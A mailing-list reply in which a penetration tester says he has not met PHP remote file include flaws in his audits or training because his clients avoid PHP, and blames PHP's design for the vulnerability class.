Re: Remote File Include Vulns (Are you testing for it, are you teaching it)

[Tim <tim-pentest () sentinelchicken org>]

Hi Joseph,

> I'm curious how many auditors are 1) testing for this stuff in your
> audits. Tons of blog, forum, and wiki packages have these vulns - are
> you guys testing for this stuff, and more importantly are you finding it
> vuln in your audits?

No, I haven't found this in any of my audits, because none of my clients
use PHP.

> Next question is for trainers, how much time are you spending on this
> stuff in your web application security classes. Currently I'm spending a

No, I haven't really included this in training... I recommend people
instead use a different language.  But, as I mentioned above, none of
the clients I've given training to use PHP.  

Seriously though, this whole remote file include issue would be
non-existant if the PHP developers took a minute to think about the need
for such an idiotic feature.  Yet this category of vulnerability has
scored as one of the most numerous reported to the CVE.  That's just
disgusting.  How many other blatantly unsafe features have made it into
PHP now, with that kind of development oversight?

I'm a big fan of open source, and I used to code in PHP to pay the
bills, so don't take my criticism as a LAMP vs .NET argument.  I just
recommend the P in LAMP to be something other than PHP.

It's kinda cold out today, so let the flames begin,
tim

------------------------------------------------------------------------
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------